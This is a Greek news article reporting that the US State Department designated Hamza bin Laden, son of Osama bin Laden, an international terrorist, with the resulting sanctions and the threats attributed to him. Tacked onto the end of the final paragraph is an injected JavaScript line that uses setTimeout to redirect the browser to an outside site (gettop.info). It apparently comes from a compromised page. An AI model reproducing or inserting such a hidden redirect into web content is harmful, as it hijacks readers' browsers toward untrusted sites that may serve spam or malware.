Και ο μεγαλύτερος γιος του Οσάμα μπιν Λάντεν, στη λίστα των «διεθνών τρομοκρατών» της Ουάσινγκτον

0
11

 

Οι αρχές των Ηνωμένων Πολιτειών της Αμερικής προσέθεσαν σήμερα στη μαύρη λίστα των «διεθνών τρομοκρατών» τον γιο του αποθανόντα ηγέτη της αλ Κάιντα Οσάμα μπιν Λάντεν, τον Χάμζα μπιν Λάντεν, μια απόφαση η οποία σημαίνει την αυτόματη επιβολή νομικών και οικονομικών κυρώσεων σε βάρος του ενδιαφερομένου.

Ο προσδιορισμός από το Στέιτ Ντιπάρτμεντ του Χάμζα μπιν Λάντεν ως «διεθνούς τρομοκράτη» βασίστηκε στο γεγονός ότι η αλ Κάιντα ανακοίνωσε τον Αύγουστο του 2015 ότι ο νεαρός ανήκε στο εξής στις τάξεις του τζιχαντιστικού δικτύου, αλλά και στο γεγονός πως ο ίδιος απείλησε τις ΗΠΑ και τους υπηκόους της σε ένα ηχητικό μήνυμα το οποίο μεταδόθηκε τον περασμένο Ιούλιο, σύμφωνα με ανακοίνωση της αμερικανικής διπλωματίας.

Η διοικητική διαδικασία στις ΗΠΑ ως προς αυτόν τον κατάλογο σημαίνει την επιβολή κυρώσεων, οικονομικών και νομικών, σε ξένους «που κρίνεται ότι διέπραξαν τρομοκρατικές ενέργειες ή αποτελούν μεγάλο κίνδυνο ως προς τη διάπραξη» τέτοιων, σύμφωνα με το ΥΠΕΞ των ΗΠΑ.

Κατά συνέπεια όλα τα περιουσιακά στοιχεία που τυχόν κατέχει ο Χάμζα μπιν Λάντεν στις ΗΠΑ θα δεσμευθούν και σε κανέναν Αμερικανό δεν θα επιτρέπεται να συναλλάσσεται μαζί του.

Σύμφωνα με την αμερικανική διπλωματία, ο γιος του Οσάμα μπιν Λάντεν είχε καλέσει το 2015 να διαπραχθούν επιθέσεις εναντίον «αμερικανικών, γαλλικών και ισραηλινών συμφερόντων, σε Ουάσινγκτον, Παρίσι και Τελ Αβίβ» και είχε επίσης καλέσει το 2016 «φυλές που ζουν στη Σαουδική Αραβία να ενωθούν με την αλ Κάιντα στην Υεμένη στον πόλεμο εναντίον του βασιλείου της Σαουδικής Αραβίας». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here